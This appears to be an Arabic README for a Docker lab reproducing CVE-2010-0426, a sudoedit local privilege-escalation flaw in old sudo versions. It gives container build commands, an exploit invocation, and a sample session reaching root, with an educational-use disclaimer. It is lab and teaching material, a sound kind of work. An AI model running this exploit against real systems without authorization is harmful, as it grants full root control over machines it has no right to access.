
Sudo 1.6.x <= 1.6.9p21 و 1.7.x <= 1.7.2p4 تصعيد الامتيازات المحلية وحاوية قابلة للاختراق
Sudo (su "do") يسمح لمسؤول النظام بمنح مستخدمين معينين (أو مجموعات من المستخدمين) القدرة على تشغيل بعض (أو كل) الأوامر كجذر مع تسجيل جميع الأوامر والوسائط.
لإعداد بيئة قابلة للاختراق لاختبارك ستحتاج إلى تثبيت Docker، ثم قم بتشغيل الأمر التالي:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
وسيُظهر غلاف تفاعلي بصلاحيات مستخدم منخفضة.
تم العثور على الخلل في sudoedit، الذي لا يتعامل مع الأمر 'sudoedit' بشكل صحيح، مما يسمح لمستخدم ضار باستبدال الأمر sudoedit الحقيقي بأمر عشوائي.
يمكن للمهاجمين المحليين استغلال هذه المشكلة لتشغيل أوامر عشوائية كمستخدم 'root'. يمكن للاستغلالات الناجحة اختراق الحاسوب المتأثر بالكامل.
لاستغلال هذا الهدف فقط قم بتشغيل:
./exploit.sh
إذا كنت تستخدم هذه الصورة القابلة للاختراق، يمكنك فقط تشغيل:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
تم اكتشاف هذا العيب بواسطة Slouching.
هذا البرنامج أو البرنامج السابق هو لأغراض تعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (t0kx) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. المؤلف أو أي مزود إنترنت لا يتحمل أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذه البرامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية t0kx.